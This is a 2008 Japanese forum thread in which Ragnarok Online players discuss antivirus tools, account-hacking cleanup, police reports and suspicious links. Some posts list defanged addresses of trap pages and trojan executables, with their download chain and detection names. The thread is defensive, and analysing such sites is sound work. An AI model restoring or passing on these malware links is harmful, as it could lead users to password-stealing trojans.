セキュリティ対策、質問・雑談スレ5

1 ：（○口○*）さん ： 2008/03/14(金) 18:48 ID:YP1hbvgt0

※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

アカウントハックが横行する昨今、セキュリティに関して話し合いましょう。
・ウイルスソフトやスパイウェアチェックソフトなどの一般的な質問。
・アカウントハック対策に関しての討論など。
・セキュリティ関係の最新情報、ニュースなど。
・アカハックを踏んでしまった/アカハックと関係のないものを踏んでしまった時の相談
・アカハックに関してはRO板の総合対策スレでも回答しますが、極力こちらをご利用下さい。
・アカハックと関係無いものに関する相談が総合スレに書き込まれた場合、こちらに誘導を。
・危険性があるURLは必ず「.」を「■」に置き換えて貼り付けください。

アカウントハック総合対策スレ9
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/

■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

現在のテンプレは暫定的なものです。スレの話し合いの結果はROセキュリティWikiへ。

・ROセキュリティWiki
　　http://rosafe.rowiki.jp/

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。

【過去スレ】
セキュリティ対策、質問・雑談スレ4
http://enif.mmobbs.com/test/read.cgi/livero/1197889519/

2 ：（○口○*）さん sage ： 2008/03/14(金) 18:49 ID:YP1hbvgt0

【参考アドレス】
・ROアカウントハック報告スレのまとめサイト
　　http://sky.geocities.jp/vs_ro_hack/
・hostsファイル追加分まとめサイト(臨時)
　　http://sky.geocities.jp/ro_hp_add/
・安全の為に (BSWikiより)
　　http://smith.rowiki.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
　　http://lineage.nyx.bne.jp/
【このスレでよく出てくるアプリケーション】
・PeerGuardian2
　　http://sky.geocities.jp/vs_ro_hack/pg2.htm
・WindowsUpdate
　　http://www.update.microsoft.com/
【PCにウィルス対策ソフトを導入してない方へ】
・カスペルスキー：オンライン ウイルス＆スパイウェアスキャナ
　　http://www.kaspersky.co.jp/scanforvirus/
・Kaspersky Anti-Virus (体験版)
　　http://www.kaspersky.co.jp/trial/
　　http://www.just-kaspersky.jp/products/try/
・NOD32 アンチウイルス (体験版)
　　http://www.canon-sol.jp/product/nd/trial.html
・ESET Smart Security（体験版）NOD32＋FW機能
　　http://canon-sol.jp/product/ess/trial.html
・AVG7.5 free（無料）
　http://free.grisoft.com/doc/download-free-anti-virus/jp/frt/0
・Avast4 HomeEdition（無料）
　http://www.avast.com/jpn/download-avast-home.html
・KINGSOFT InternetSecurty Free（無料）
　http://download.kingsoft.jp/kisfree/

3 ：（○口○*）さん sage ： 2008/03/14(金) 18:49 ID:YP1hbvgt0

■PG2用 RO許可リスト■
RAGNAROK-JP:61.215.212.0-61.215.212.255
RAGNAROK-JP2:61.215.214.128-61.215.214.255
WEB-SYSTEM:61.215.220.64-61.215.220.255
RAGNAROK-JP2:211.13.228.0-211.13.228.255
GUNGHO-MODE:211.13.229.0-211.13.229.255
RAGNAROK-JP3:211.13.232.0-211.13.232.255
RAGNAROK-JP4:211.13.235.0-211.13.235.255
GUNGHO-PAT1:219.123.155.160-219.123.155.191
GUNGHO-PAT1:221.247.195.160-221.247.195.191
GUNGHO-PAT3:125.101.19.64-125.101.19.95
GUNGHO-PAT4:124.32.117.192-124.32.117.22

■セキュスレ2-969によるhosts更新支援スクリプト■

あこすれてんぷら避難所を間借りする事で公開しました。
ttp://acopri.s250.xrea.com/index.php?hostsRenewScript

一応説明を付けていますが、自己責任、という事でお願いします。
cfgとvbsの２ファイル構成で、動作に必要なwget等は付属してません。

※ 配布ページとファイルをよく読んで、【自己責任にて】 ご利用ください

4 ：（○口○*）さん sage ： 2008/03/14(金) 18:51 ID:YP1hbvgt0

【質問・相談の際の注意】
・誤クリックによる感染を防ぐ為、危険なアドレスは必ず　.(ドット)を別の文字に
　置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレやまとめサイト等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。提供した情報の量と質に
　応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません
・基本的な対処方法は、総合対策スレの>>5をお読みください。
　http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/5

----------相談用テンプレ----------

【　 　 　 気付いた日時　 　 　 　 　 】 (感染？に気付いた日時)
【不審なアドレスのクリックの有無　】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【　　アドレス 　 】www■xxx■yyy/index.htm(ドメインのドット(.)を■等で置き換える事。h抜き等は駄目)
【　 　　 OS　 　 】WindowsXP Home SP2 (SP等まで正確に書く)
【使用ブラウザ 】IE6.0 sp2 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【　アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンで Trojan-PSW.Win32.〜 発見 等)
【テンプレの参考サイトを読んだか】 (Yes/No/今から読みます)
【hosts変更】(有/無　[有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】
(『怪しいアドレス』との判断した理由、症状を詳しく書く)

5 ：（○口○*）さん sage ： 2008/03/14(金) 18:51 ID:YP1hbvgt0

【安全対策の簡易まとめ】
以下は要点となります。詳しくは関連サイトを見てください。

　・アドレスをホイホイ踏まない。よく確認する。
　・出所の怪しいプログラムやスクリプトを実行しない。
　・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデートを行う
　・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新を行う
　・パーソナルファイアウォールソフト等を導入する
　　　・hostsの利用した危険ドメインのブロック
　　　・PeerGuardian2を使った危険IPのブロック　など
　・IEコンポーネント未使用のブラウザに乗り換える(Firefox、Opera等)
　・IEを使う場合は下記を設定
　　・信頼できるSite以外ではスクリプトやActiveXを切る
　　　：インターネットオプションのセキュリティの部分で設定可能
　　・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
　　　：インターネットオプション→セキュリティ→レベルのカスタマイズ
　　　　→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

6 ：（○口○*）さん sage ： 2008/03/14(金) 18:53 ID:YP1hbvgt0

■なにか踏んだ時に取るべき対処■
０．解決するまで、ログインやパスワード変更を行なわない。踏んだ後にパスワード入力などを行なってしまった場合
　　安全な環境（テンプレぽいものや、Ragnarok板側のテンプレ、Wikiを参照）からパスワード変更。

１．除去し、クリーンな環境に戻す
１−１．発見された場合。
それを削除して完了

１−２．発見されなかった場合
１−２−１．リスクを覚悟でそのまま使う（非推奨）
　　　 　　 リスクを減らす為に、NOD32、カスペなど複数のソフト（試用版が入手できる筈）でスキャンを繰り返し
　　　 　　 安全である可能性が高いことを確認すること。
　　　 　　 ただし複数のソフトを同時にインストールすると干渉してOSが不安定になる事があるので注意。
１−２−２．再インストール
メーカー製の場合、データのバックアップをとって、リカバリーをかける。
自作やショップブランドの場合、データのバックアップをとって、ＯＳを入れなおす。

１−３．安全な環境にする
１−３−１．WindowsUpdateをかける
１−３−２．ウィルス対策ソフト・ＦＷ・PG2を導入し、設定する。
　　　　　　　　　（可能なら、スパイウェア対策のソフトも導入し、定期的にスキャンする）
１−３−３．セキュリティソフトの定義ファイルを最新にする。（当然定期的に自動更新する設定に）

１−４．環境を戻す
　　　　　バックアップした「データ」を戻す。各種ソフトを再インストール。
　　　　　その後、ウィルススキャンを再度実行。
　　　　　ウィルスはバックアップしたデータ内に潜んでいる可能性があります。

１−５．ガンホーIDを削除す…ではなくて、ようやくROをプレイできる環境になりました、おめでとう。

7 ：（○口○*）さん sage ： 2008/03/14(金) 18:54 ID:YP1hbvgt0

【このリンクは危険？と思ったときに】
変なリンクを見つけた場合、次の方法でチェックしましょう。

1.まとめサイトやリネージュ資料室のhostsや危険ドメイン一覧で確認
　過去に見つかった罠サイトは、これらのサイトに載っています。
　まずはここに載っていないかを確認しましょう。

2.ソースチェッカーオンラインを使って調べる
　多少の知識が必要ですが、ソースチェッカーを使うことでリンク先を調べる事が出来ます。
　ソース内に怪しいコード・スクリプトが無いか調べましょう。
　※安全か危険かの判断は自分で行う必要があります。
　　また画像ファイルをチェックする場合、罠画像ファイルだと発動する恐れもあるので
　　注意してください。

3.スレで質問する
　1.2の方法でも判断出来ない場合、スレで聞いてみるのも手です。
　ただし、このスレは『勇気が無くて見れないサイト解説スレ』ではありません。
　その点だけは注意してください。

質問・報告する場合は「.」を「■」に置き換えるのを忘れないようにしてください。

8 ：（○口○*）さん ： 2008/03/15(土) 18:54 ID:nbGUYR5e0

mixiの足跡踏んで日記リンク見たらよくわからんサイトだったんだけど垢ハックの可能性あるのかな
ttp://kenko-y■blogspot■com/2008/03/i-can-not-understand■html
よくわからないんだけど誰か教えてください
URLチェックしてみたけど安全性87％とか残りの13％は危険ってことですかって感じでパニくってるんですが・・・

9 ：（○口○*）さん sage ： 2008/03/15(土) 19:17 ID:kam+vWBa0

アカウントハックとは関係なさげ。

10 ：（○口○*）さん ： 2008/03/16(日) 18:51 ID:eChWfIdA0

警察行って状況を話したんだけど
何かあったら連絡しますって言われた後は待ち続けたほうがいいの？
目安とかない？

11 ：（○口○*）さん ： 2008/03/16(日) 18:59 ID:eChWfIdA0

警察に出向いて調査してもらったけど
復旧まで漕ぎ着けられなかったって方いる？

12 ：（○口○*）さん sage ： 2008/03/16(日) 19:11 ID:rtI/4ljr0

週一くらいで連絡したら?
何かあったら連絡します→何もなければ連絡しません

13 ：（○口○*）さん sage ： 2008/03/17(月) 02:45 ID:TyORplqk0

このスレから質問スレに神聖が出張してきているんだが、
お持ち帰り願えないでしょうか？

14 ：（○口○*）さん sage ： 2008/03/17(月) 02:50 ID:b5WuP64p0

そうやって逆に出張してくるのも神聖に見えると理解するべき

15 ：（○口○*）さん sage ： 2008/03/17(月) 02:53 ID:EHmW8B2d0

神聖スレでも手に負えないとかどんだけ

16 ：（○口○*）さん sage ： 2008/03/17(月) 03:08 ID:hTT9PMQP0

>>10
仕事の都合上時々警察署の人とやりとりしてた頃の経験で言うと、忙しいとかで連絡忘れたりとか、
明日書類持って行きます→事件はいっちゃってまた後日〜→忘却、がたまにある。署によるけど。

受け付けてくれたのが交番ならすぐに話を始められるし、
警察署だったら電話受付の人がいるから、そのまま「内線○○番の○○さん」で呼び出し、
本人不在でも「○月○日、○課の○○さんに対応していただいた件で、
状況教えていただきたいんですが」とかいえば、
時間があるなら詳細を聞いてさがしてくれたり、担当者から折り返し連絡がもらえた。

17 ：（○口○*）さん sage ： 2008/03/17(月) 03:41 ID:gCtHnp8A0

物質スレのこれだな。
無関係のスレに迷惑かけんなよ。

812 ：（○口○*）さん ：08/03/16 17:53 ID:iZFBhaH30
セキュスレ住人って気違い多いよな


813 ：（○口○*）さん ：08/03/16 17:57 ID:MB28daxc0
>>812
それは質問なのか？

820 ：（○口○*）さん ：08/03/16 18:45 ID:UVAwLPnx0
セキュスレ住人は誘導したがり多いからな

18 ：（○口○*）さん sage ： 2008/03/17(月) 17:12 ID:W05W7Vww0

カスペ7.0MP1再公開
ttp://www.just-kaspersky.jp/support/v7mp1/

19 ：（○口○*）さん sage ： 2008/03/17(月) 17:30 ID:Z1WDm9/+0

今回はすぐに入れずに様子見する

20 ：（○口○*）さん sage ： 2008/03/17(月) 19:22 ID:inC807Nh0

おなじく

21 ：（○口○*）さん sage ： 2008/03/17(月) 21:01 ID:/fRRggOV0

前回のMP1でトラブルが一切出てないからそのまま使い続けてる俺はどうしたもんだか。
入れ直しした方がいいかねぇ？

22 ：（○口○*）さん sage ： 2008/03/17(月) 23:38 ID:qTiXeqCu0

【　 　 　 気付いた日時　 　 　 　 　 】08/03/16 23:00
【不審なアドレスのクリックの有無　】 mixiからコピペしようとして踏む
【　　アドレス 　 】http://mx■ynjsj■com/ragnarokonline/p-t-00404-v03687/v0368700000000437727■wmv■zip
　　　　　　　　及びhttp://mx■ynjsj■com
【　 　　 OS　 　 】XP　home　SP2
【使用ブラウザ 】 firefox　2.0.0.12
【WindowsUpdateの有無】 先月位だったはず
【　アンチウイルスソフト 】ｳｲﾙｽﾊﾞｽﾀｰcorp for windows server2003
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 手動でrundll132.exeとrodll.dllを検索するも見つからず。
　　　　　　　　　　　　　その後spybotを使用。
【テンプレの参考サイトを読んだか】 パっと一通り読みました。詳しく読み直します。
【hosts変更】無
【PeerGuardian2導入】無

zip直リンクのほうは危険度が低いと思いますが、URLをチェッカーにかけようと思って
誤ってhttp://mx■ynjsj■comを踏んでしまいました。
ページ内に何があるか私には解析できないのでどなたかアドバイスをお願いします。
できる限りOS入れなおさない方向でと考えています。

23 ：（○口○*）さん sage ： 2008/03/18(火) 00:04 ID:CUu+kq550

>>22
http://mx■ynjsj■com/ は、現時点ではデータがない模様。（踏んだ時点は知らない）

VirusTotalにかけた結果は下記の通り。
zipを解凍して、wmvに見えるexeを実行した時点で発動させることになる模様。

v0368700000000437727■wmv■zip
HIDDENEXT/Worm.Gen(AntiVir)
Trojan.Inject.796(DrWeb)
Suspicious File(eSafe)
W32/Inject.AE!tr(Fortinet)

v0368700000000437727■wmv■exe
Trojan.Inject.796(DrWeb)
Suspicious File(eSafe)
W32/Inject.AE!tr(Fortinet)

発動させてるかどうかの保証はできないので、自己責任でそのまま使うか、OS入れ直しか判断するように。
検知可能な、Dr.Webのオンラインスキャン…は、ファイル単体なので、同じエンジンを使っているウィルスチェイサーの
とこでも利用しとけば比較的安心かも？

http://www.drweb-online.com/en/virustest.html
http://www.viruschaser.jp/support_online.html

24 ：（○口○*）さん sage ： 2008/03/18(火) 00:14 ID:+oeu1lDT0

>>23
ありがとうございます。

zipは解凍していないので発動はしていないかと思われます。
ウイルスチェイサーを利用してみます。

25 ：（○口○*）さん sage ： 2008/03/18(火) 04:17 ID:Jigb/BGw0

【　 　 　 気付いた日時　 　 　 　 　 】08/03/16 01:00
【不審なアドレスのクリックの有無　】 クリックして踏む
【　　アドレス 　 】www■skywebsv■com/Blog/
【　 　　 OS　 　 】XP　Pro　SP2
【使用ブラウザ 】 firefox　2.0.0.12
【WindowsUpdateの有無】 ２週間前ほど
【　アンチウイルスソフト 】avast!
【その他のSecurty対策 】 ADaware
【 ウイルススキャン結果】 Avast検出なし。カスペオンラインでも実行したが検出なし。
DrWebのオンラインスキャンでもスキャン。検出なし。罠iframe先にあるexe(www■skywebsv■com/Blog/k1■exe)をDLしてきてスキャンしたら検出する。
【テンプレの参考サイトを読んだか】 できる限りの処置はないかと読みました。
【hosts変更】無
【PeerGuardian2導入】無

トロイがレジストリ改竄しそうな場所を確認したが素人目で問題なさげ。
踏んですぐURLで検索すると「リネージュ資料室」が見つかったので熟読。
PeerGuardian2導入して動向を観察する。
リネージュ資料室のブロックリストを追加してみると、
起動時とそれ以降不定期で「Korea 211.234.242.174 : 80 TCP」を頻繁にブロックしてた。
www■egloos■comっていう韓国のブログサービスぽいんだけど･･･
このサイトを踏んだために起きている挙動かは不明、、、

PeerGuardian2を利用して211.234.242.174を頻繁にブロックしてるのは俺だけなんだろうか･･･

26 ：（○口○*）さん sage ： 2008/03/18(火) 10:33 ID:CUu+kq550

>>25
２週間ほど前だと、中身が変わってる可能性高いので、参考にならないかも。現在exeは3/14のものになってますし。
不安が残るならOS再インストールコース。これ必須。そんな訳で検体提出行ってきます。

PG2に関しては設定しているリストや、常駐アプリ次第だったりもするのでパス。

ttp://www■skywebsv■com/Blog/
ttp://www■skywebsv■com/Blog/index1■htm
ttp://www■bluewoon■com/Blog/k1■exe

index.htm
　　HTML/Infected.WebPage.Gen(AntiVir)
　　HTML.Iframe-12(ClamAV)
　　HTML.Infected.WebPage(Ikarus)
　　Script.Infected.WebPage.Gen(Webwasher-Gateway)

index1.htm
　　JS/Dldr.Noopt.1969(AntiVir)
　　VBS/Psyme.FF(Authentium)
　　JS/Downloader.Agent(AVG)
　　JS/Dldr.Noopt.1969(CAT-QuickHeal)
　　Downloader.AniLoad.nae(Ewido)
　　VBS/Psyme.FF(F-Prot)
　　VBS/Agent.EB!tr.dldr(Fortinet)
　　Mal/Psyme-A(Sophos)
　　Script.Dldr.Noopt.1969(Webwasher-Gateway)

27 ：（○口○*）さん sage ： 2008/03/18(火) 10:33 ID:CUu+kq550

k1.exe
　　Win-Trojan/Inject.42496.J(AhnLab-V3)
　　TR/Inject.aex(AntiVir)
　　Generic10.BAU(AVG)
　　Trojan.Inject.796(DrWeb)
　　Suspicious File(eSafe)
　　Trojan.Win32.Inject.aex(F-Secure)
　　W32/Inject.AE!tr(Fortinet)
　　Virus.Trojan.Win32.Inject.aex(Ikarus)
　　Trojan.Win32.Inject.aex(Kaspersky)
　　PWS:Win32/Magania.F(Microsoft)
　　Win32/PSW.Gamania.NAC(NOD32v2)
　　W32/Inject.AWL(Norman)
　　Mal/Generic-A(Sophos)
　　Trojan.Inject.aex(Webwasher-Gateway)

28 ：（○口○*）さん sage ： 2008/03/18(火) 11:08 ID:RMPkaVXF0

>>10　警察で話ししただけじゃないよね？ちゃんと届けだした？
ガンホーの方にも報告ねーアカウントハックの体験とか読んでチェックすべし

>>11　警察までいっても　登録情報が虚偽であったり
パスワードなどを他人に教えてたり（アカウント共有）した場合最悪
パスをもらした人が罪にとわれる場合もあるよ
あと共有してた友達が逮捕とかねー

あとは警察に届けた！けどだめだった！という報告自体が嘘で
借りパク詐欺ってのは最近ありそう　合言葉は「だってガンホーだし」

29 ：（○口○*）さん sage ： 2008/03/18(火) 12:38 ID:Jigb/BGw0

>>26
わざわざありがとう。２週間前なのはWindowsUpdateで、
踏んだのは２日前ですので同じexeだと思います。
そしてアドバイス？どおり常駐切っていったら211.234.242.174ブロックは
なくなりました。(グーグルデスクトップが原因だったぽい。)

クリックしてからexeダウンロードまで鯖が重いのか時間がかかるみたいなので
たぶん踏んだけど踏んでないような感じと判断することにしました。
(インラインフレームだからFireFoxだと無害かもですし。)

質問なんですが、もしexeに感染(起動)した場合、
ウイルスソフトは検出ってできるんでしょうか？
アカハックのウイルスexe(今回はk1.exe)自体はスキャンできても、
感染後の修復の為に検索した際、「感染してますよ」レベルでいいから
感知されるのかどうか・・・

って質問しすぎですな。
時間できたときバーチャルPCで自分で踏んで確かめてきますｗ

30 ：（○口○*）さん sage ： 2008/03/18(火) 14:00 ID:ttRLA9BE0

>>27 見ればわかるだろ?
そこに出ていない物(ノートンとか)は(投稿時点では)検知しない。
まともなアンチウイスルベンダなら送られてきたk1.exeに対してのみ
パターンを作成するのではなく、k1.exeを実際に踏んで
レジストリやファイルがどう変わったかを調べた上でパターンを作成する。

31 ：（○口○*）さん sage ： 2008/03/18(火) 14:56 ID:CUu+kq550

あ、そうか。踏んだ時点が3/16なら同じexeの「可能性」がありますね。

踏んだ場合の検知
・そのファイルを書き込もうとした時点
・そのファイルを起動するためにメモリに読み込んだ時点
・発動して、レジストリなどになんらかの書き込みが発生した時点

セキュリティソフトを常駐させてれば上記のタイミング等で検知できる可能性がある。

レジストリなどに書き込まれている場合、exeが存在するだけの場合などは、その領域を
セキュリティソフトでスキャンした時点で発見される。

OS起動時にセキュリティソフトより前に起動し、セキュリティソフトの起動を阻害する形のものの場合
検知できないケースもあり得る。

32 ：（○口○*）さん sage ： 2008/03/18(火) 18:45 ID:CUu+kq550

セキュWikiの検体提出先修正

3/14〜3/18に送信したものが全て宛先なしで戻ってきた
Prevx(Prevx1) <virus@prevxresearch.com>

PrevxのHPからサンプルの送付先はどこかと質問した所、戻ってきた返答
VirusTotalに投げればOKとのこと。

｜Hi,
｜Please upload it at www.virustotal.com.
｜Regards,
｜Prevx Support

33 ：（○口○*）さん sage ： 2008/03/19(水) 00:51 ID:aoPWyb1W0

niftyもtypo狙いの偽ドメインだけでなく、本体に被害が出始めた。

［セキュリティ］ニフティ、韓流コンテンツなどで改ざん被害、ウイルス感染の危険を警告（ＢＣＮ） - Yahoo!ニュース
ttp://headlines.yahoo.co.jp/hl?a=20080318-00000022-bcn-sci

>　ニフティ（和田一也社長）は、同社が運営するWebサイト「@nifty」のコンテンツの一部が不正に改ざんされ、閲覧しただけで
>ウイルス感染の危険があったと発表した。当該のコンテンツは「@nifty韓流」と「太王四神記公式ホームページ」の2つ。

34 ：（○口○*）さん sage ： 2008/03/19(水) 07:06 ID:rpfTY6jI0

>>32
やる気無いなぁｗ

F-Protの送信フォームも前から死んでるねぇ
ttp://www.f-prot.com/virusinfo/submission_form.html

35 ：（○口○*）さん sage ： 2008/03/19(水) 07:31 ID:JmBR6Dmt0

既出の質問かもしれません。だとしたら申し訳ありません。

→友人が昨日25時にアカハックURLクリック。
→友人，今朝6時半。アカハック踏んだ自宅PCでROにログイン。そのまま出社。
→私，7時。急いでその友人からログインIDとパスとキャラパス教えてもらい，計2キャラのキャラパス変更，空きスロ3に新規キャラ作成ならびキャラパス設定。
→私，7時。幸いな事に装備，倉庫は無事でした。←今ココ

そこですみません。二点ご質問が…。
この今の状態なら，IDとパスを使ってアクセスできても，キャラ選択画面から先に進む事は不可能でしょうか？

友人にこの後のすべき事を伝えたいのですが，今後は
ログインIDとパスワードの変更と，
>>6にあります１−２−２．以後に書かれてある作業を行えばよいのでしょうか。

これで合ってるのか不安で皆さんにお聞きしましたｏｒｚ。

36 ：（○口○*）さん sage ： 2008/03/19(水) 07:44 ID:JmBR6Dmt0

すみませんでした。
総合スレのほうを一から見ていて自己解決しました。
先走ってしまってすみませんでした…。

37 ：（○口○*）さん sage ： 2008/03/19(水) 08:18 ID:rpfTY6jI0

Safari3.1正式版来てた。
ttp://www.apple.com/jp/news/2008/mar/18safari.html
ttp://www.apple.com/jp/safari/download/

Bonjourはよくわからんけど(UPnPみたいなもん?)外しておきましょう。

Firefox3より先に出るとは思わなかった。

38 ：（○口○*）さん sage ： 2008/03/19(水) 08:56 ID:rpfTY6jI0

VistaSP1正式版
ttp://support.microsoft.com/kb/936330/
x86 ttp://www.microsoft.com/downloads/details.aspx?FamilyID=b0c7136d-5ebb-413b-89c9-cb3d06d12674&DisplayLang=ja
x64 ttp://www.microsoft.com/downloads/details.aspx?FamilyID=874a414b-32b2-41cc-bd8b-d71eda5ec07c&DisplayLang=ja

39 ：（○口○*）さん sage ： 2008/03/19(水) 09:59 ID:BlT9+Fm30

>>34
ああ、そっちは、問い合わせたら、今回はメールで送ってくれって返事来た。
その次はフォーム復活してたのでフォームで送ったが、また死んでるので、今はメールでも送ってる。

F-PROT Antivirus Technical Support <support@f-prot.com>

そういや、こっちも書き換えといた方がいいかもなー。

40 ：（○口○*）さん sage ： 2008/03/19(水) 12:01 ID:rpfTY6jI0

かなり前から、というかフォームが動いてるのを見たことがない。
post先のメールボックスがすんげー小さくて、満杯になったら
無効化される素敵フォームなんじゃないかと思ってる。

41 ：（○口○*）さん sage ： 2008/03/19(水) 12:42 ID:aoPWyb1W0

やる気の無いベンダーは、見捨てた方が会社にもユーザーの為にもいいんじゃないの。
選択されることが無くなれば、自然に淘汰される。

42 ：（○口○*）さん sage ： 2008/03/19(水) 12:57 ID:rpfTY6jI0

まー日本でF-Prot使う人はあまり(VBA32やVirusBuster並に)いないと思うので
その辺は趣味で。

43 ：（○口○*）さん sage ： 2008/03/19(水) 19:12 ID:ClDTQZk90

>>10
遅くなりましたが、前スレに体験をかいてきてますので、よろしければ。
http://enif.mmobbs.com/test/read.cgi/livero/1197889519/629,670,671,740,755,774,983

昨日最寄署に出向いてまいりました。
ガンホーから取り寄せた資料、中身は文字も小さく見えませんでしたが
私が最終正常ログインした時間〜異常に気付いた時間までの
私のキャラの行動データをExcelに落としたもののようで、担当警官が読んでくれました。

まず、他者によって３回のログインがされていたこと。
１回目はINのみでOUTログがない（これはマクロ等の都合かもしれませんが理由不明）
２回目は５分前後、３回目は10分前後のIN-OUTとなっていました。

２回目のIN時はキャラの持っていたアイテム、所持金、カーと中身を全て別キャラに取引窓で渡し。
サブキャラにも全てそれを行ったあと、３回目のINをして
倉庫のアイテムを一部のゴミカード等以外全て取り出し、取引窓で取引していました。
露店に出してもすぐ高値で売れなさそうなものは全てNPCに売っていました。
作業スピードからいってマクロだろう、常習犯ではないかという話しになりました。

次にハックされた方法ですが、1月の連休時に連れが遊びにきてデスクトップ機を使っており、
その際踏んだと思われる日時でのトロイがハッキング発覚後のウイルスチェックで発見されたこと。
そのPCで使っていなかった別アカは無事だったことなど、詳しい状況を説明。

また、ゲームの経験が無い担当者ということで、ログインの手順や取引システムなどを説明し、
NPCとはなにか、どう使うのか、RMTとは何かを説明。
目的はとったZenyと、アイテムもおそらくZenyに変えてRMTで現金を得るのではないかと話しました。
非常に興味を持って納得してくれた様子で、またこの不正アクセスを行ったIP・ホストと
受け渡したキャラのIP・ホスト情報から捜査を進めてくれるとのことでした。

ちなみに、以前にもFF等で似た案件があったそうですが、
アイテムが帰ってくると「ありがとう、はいさようなら」なユーザーが多いそうです。
国際犯罪であり、組織的な可能性もあって裏に大きな犯罪組織があることもあるため、
その後も捜査協力して欲しいのだが…と愚痴っぽく話しておられましたので、
IT関係者でもあり日本円の海外流出問題は認識している。
なにかあれば、私のアイテムが戻ったあとも協力しますと伝えました。

44 ：（○口○*）さん sage ： 2008/03/19(水) 19:18 ID:ClDTQZk90

お話をしたのはだいたい一時間くらいでした。
真面目な捜査官でユーモアもあり、話しやすくて助かりました。
ガンホーとのやり取りの時系列と、警察とのやり取りの時系列を詳しく知りたがっていたので、
印刷環境のある人はガンホーとのやり取りを印刷してお渡ししたほうがいいと思います。
（無理なら、署のPCで印刷させていただくと良いです）
あとは、こちらも出来る限り情報提供の協力をするという姿勢が大事だと思います。
一緒にハックされた相方のことも調書に必要ということなので、
週末に会った時私から担当者に連絡を入れて電話をかわり、話してもらう予定です。

45 ：（○口○*）さん sage ： 2008/03/19(水) 20:04 ID:wW2w8BMM0

乙です。これはありがたい報告。

46 ：（○口○*）さん sage ： 2008/03/19(水) 21:03 ID:BlT9+Fm30

一般的話題なので総合スレから移動

｜518 (^ー^*)ノ〜さん sage 08/03/19 18:22 ID:em6QsCyE0
｜垢ハック・又は罠を踏んでから、OSの再インストールをせずにカスペル等で
｜駆除した後被害にあった報告って今までにありました？
｜
｜519 (^ー^*)ノ〜さん sage New! 08/03/19 20:17 ID:pkeYl+BT0
｜>>518
｜ありました。再インストがんば

駆除した際に、複数のトロイ等が入れられており、すり抜けたものが残ることがあり得る。
その場合、すり抜けたものによって、(一部)駆除したのに(残ったものによって)アカハックを食らうという
事例が発生する。

実際にそうなったという具体的な報告があったかどうかは記憶にないが、確認することもないだろう。

駆除できても、何かが残っている可能性があり、完全に安全な環境に戻ったという保証はできないので
踏んでしまったらOS再インストールコースというのが、セキュスレ・総合対策スレ共通の対処の指針だと思う。

検体確認し、検出名を報告してくれているのを見てすり抜けて残っているものが存在する可能性の程度を
自分で判断できる人が自己責任でどうこうするのは自由ですけどね。

>>43-44
報告乙です。

こういった後にしっかり残しておきたい報告こそ、ログの残るRO板の総合スレに投下して欲しいと思うがどうだろう。

47 ：（○口○*）さん sage ： 2008/03/19(水) 21:19 ID:E8ieV4IQ0

個人的には同意だな。
相談でも雑談でもないし、一般的なセキュリティというより明らかにアカハックに関係した
いわゆる重要な情報と言ってもいいくらいの報告だし。

48 ：（○口○*）さん ： 2008/03/19(水) 22:48 ID:Egb5nOns0

>>43-44
おつです
先日警察署に出向いたので参考にさせていただきます

しっかしうちの警察署は無関心すぎて何度も同じこと言わなくちゃいけなくてつらい(´；ω；`)

49 ：（○口○*）さん ： 2008/03/19(水) 23:37 ID:mIEj4R/t0

RMCの取引板で踏んでしまったのですが、これはアカハックアドレスなのでしょうか
ttp://momohac■blog34■fc2■com/blog-entry-1■html
すぐにRO落としてウィルスチェックしているのですが不安で…

50 ：（○口○*）さん sage ： 2008/03/19(水) 23:41 ID:xFzMmqdf0

※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

でも垢ハック含まれてる

51 ：（○口○*）さん ： 2008/03/19(水) 23:51 ID:mIEj4R/t0

>>50
申し訳ないです
ウィルスチェック終わったら駆除してOS再インストールやってみます。ありがとうございました

52 ：（○口○*）さん sage ： 2008/03/19(水) 23:55 ID:BlT9+Fm30

>>50
このツンデレめｗｗｗ

ttp://momohac■blog34■fc2■com/blog-entry-1■html
ttp://www■shagigi■net/navi/
ttp://www■shagigi■net/navi/index1■htm
ttp://www■shagigi■net/navi/admin■exe

こんな順序で呼び出し

->blog-entry-1.html
-->index.htm
--->index1.htm
---->admin.exe

admin.exeは２種類のトロイが入った自己解凍型。2008/03/07製、検体提出済の奴だな。

index.htm : HTML/Infected.WebPage.Gen(AntiVir)
index1.htm : Trojan-Downloader.VBS.Agent.jq
admin.exe/f.exe : Trojan-PSW.Win32.OnLineGames.tge
admin.exe/l1.exe : Trojan.Win32.Inject.aci

53 ：（○口○*）さん ： 2008/03/19(水) 23:57 ID:wOG7S1rv0

こんなところに報告するよりURL偽装のハッキングは立派な
ネット犯罪なんだから通報が先だってばwwwwwwwwwwwww

54 ：（○口○*）さん sage ： 2008/03/20(木) 00:01 ID:wytvkezw0

>>51
OS再インストールやるなら、駆除する意味が・・・まぁ、いいか。

「バックアップ→OSインストール→WindowqsUpdate→セキュリティソフトの導入と定義更新→各種アプリ導入等」

55 ：（○口○*）さん ： 2008/03/21(金) 10:58 ID:NL0iOyoW0

はじめまして、失礼します。
ここ数日、自分のmixiに、ROっぽいけど意味不明な文言とともにzipファイルへのアドレスが
